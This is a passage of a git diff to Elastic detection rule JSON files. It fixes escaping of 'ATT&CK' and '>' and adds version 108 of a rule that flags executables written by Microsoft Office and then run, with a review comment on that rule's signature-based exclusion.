 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -87,7 +87,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_107.json b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_107.json
index 76c30878592..6f875bc1370 100644
--- a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_107.json
@@ -88,7 +88,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -97,7 +97,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_108.json b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_108.json
new file mode 100644
index 00000000000..199e26e7a4f
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_108.json
@@ -0,0 +1,132 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies an executable created by a Microsoft Office application and subsequently executed. These processes are often launched via scripts inside documents or during exploitation of Microsoft Office applications.",
+ "from": "now-120m",
+ "index": [
+ "logs-endpoint.events.*",
+ "winlogbeat-*",
+ "logs-windows.*",
+ "endgame-*"
+ ],
+ "interval": "60m",
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Execution of File Written or Modified by Microsoft Office",
+ "note": "## Triage and analysis\n\n### Investigating Execution of File Written or Modified by Microsoft Office\n\nMicrosoft Office, a widely used suite of productivity applications, is frequently targeted by attackers due to its popularity in corporate environments. Attackers exploit its extensive capabilities, like macro scripts in Word and Excel, to gain initial access to systems. They often use Office documents as delivery mechanisms for malware or phishing attempts, taking advantage of their trusted status in professional settings.\n\nThis rule searches for executable files written by MS Office applications executed in sequence. This is most likely the result of the execution of malicious documents or exploitation for initial access or privilege escalation. This rule can also detect suspicious processes masquerading as the MS Office applications.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. 
Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "sequence with maxspan=2h\n [file where host.os.type == \"windows\" and event.type != \"deletion\" and file.extension : \"exe\" and\n (process.name : \"WINWORD.EXE\" or\n process.name : \"EXCEL.EXE\" or\n process.name : \"OUTLOOK.EXE\" or\n process.name : \"POWERPNT.EXE\" or\n process.name : \"eqnedt32.exe\" or\n process.name : \"fltldr.exe\" or\n process.name : \"MSPUB.EXE\" or\n process.name : \"MSACCESS.EXE\")\n ] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\" and \n not (process.name : \"NewOutlookInstaller.exe\" and process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ] by host.id, process.executable\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.extension",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.code_signature.subject_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": 
"process.code_signature.trusted",
+ "type": "boolean"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5",
+ "severity": "high",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": []
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0001",
+ "name": "Initial Access",
+ "reference": "https://attack.mitre.org/tactics/TA0001/"
+ },
+ "technique": [
+ {
+ "id": "T1566",
+ "name": "Phishing",
+ "reference": "https://attack.mitre.org/techniques/T1566/",
+ "subtechnique": [
+ {
+ "id": "T1566.001",
+ "name": "Spearphishing Attachment",
+ "reference": "https://attack.mitre.org/techniques/T1566/001/"
+ },
+ {
+ "id": "T1566.002",
+ "name": "Spearphishing Link",
+ "reference": "https://attack.mitre.org/techniques/T1566/002/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "type": "eql",
+ "version": 108
+ },
+ "id": "0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_108",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_101.json b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_101.json
index a86baff0ba1..2a1f1885074 100644
--- a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_101.json
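Review bot: The NewOutlookInstaller.exe exclusion in the second stage of the sequence depends on `process.code_signature.subject_name` and `process.code_signature.trusted`, but the rule also runs over `winlogbeat-*`, `logs-windows.*` and `endgame-*`, where those fields may not be populated; on such sources the negated clause cannot match, so the benign installer sequence will still alert, and that data-source dependency is worth stating in the `note` or a `setup` field. The exclusion is keyed on `process.name`, which is attacker-controlled by renaming a binary, so the trusted Microsoft signature check is what actually keeps it safe; a triage line such as `- The NewOutlookInstaller.exe exception requires a trusted "Microsoft Corporation" signature; treat an unsigned or differently signed process with that name as in scope.` would make that explicit for analysts. Whether the exclusion is new in version 108 cannot be seen here, since the previous version's query is not in the diff.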
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_102.json b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_102.json
index 6ea4bf8c6f6..d1a52afe0cc 100644
--- a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_102.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/0e5acaae-6a64-4bbc-adb8-27649c03f7e1_103.json b/packages/security_detection_engine/kibana/security_rule/0e5acaae-6a64-4bbc-adb8-27649c03f7e1_103.json
index d106acbf52f..e468576f059 100644
--- a/packages/security_detection_engine/kibana/security_rule/0e5acaae-6a64-4bbc-adb8-27649c03f7e1_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/0e5acaae-6a64-4bbc-adb8-27649c03f7e1_103.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/0e5acaae-6a64-4bbc-adb8-27649c03f7e1_104.json b/packages/security_detection_engine/kibana/security_rule/0e5acaae-6a64-4bbc-adb8-27649c03f7e1_104.json
index 16d79bb57d6..76c6ab1bac8 100644
--- a/packages/security_detection_engine/kibana/security_rule/0e5acaae-6a64-4bbc-adb8-27649c03f7e1_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/0e5acaae-6a64-4bbc-adb8-27649c03f7e1_104.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_102.json b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_102.json
index 4aa9d7eefbf..f5da2387316 100644
--- a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_102.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_103.json b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_103.json
index 91e10b64c39..39e7cca9a79 100644
--- a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_103.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "MsBuild Making Network Connections",
- "note": "## Triage and analysis\n\n### Investigating MsBuild Making Network Connections\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThe Microsoft Build Engine, also known as MSBuild, is a platform for building applications. This engine provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy code execution.\n\nThis rule looks for the `Msbuild.exe` utility execution, followed by a network connection to an external address. Attackers can abuse MsBuild to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating MsBuild Making Network Connections\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThe Microsoft Build Engine, also known as MSBuild, is a platform for building applications. This engine provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy code execution.\n\nThis rule looks for the `Msbuild.exe` utility execution, followed by a network connection to an external address. Attackers can abuse MsBuild to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n",
 "related_integrations": [
 {
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_104.json b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_104.json
index f1e0722f753..876135cbd30 100644
--- a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_104.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "MsBuild Making Network Connections", - "note": "## Triage and analysis\n\n### Investigating MsBuild Making Network Connections\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThe Microsoft Build Engine, also known as MSBuild, is a platform for building applications. This engine provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy code execution.\n\nThis rule looks for the `Msbuild.exe` utility execution, followed by a network connection to an external address. Attackers can abuse MsBuild to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating MsBuild Making Network Connections\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThe Microsoft Build Engine, also known as MSBuild, is a platform for building applications. This engine provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy code execution.\n\nThis rule looks for the `Msbuild.exe` utility execution, followed by a network connection to an external address. Attackers can abuse MsBuild to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n",
 "related_integrations": [
 {
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_105.json b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_105.json
index 08983ffede1..ae762245268 100644
--- a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_105.json
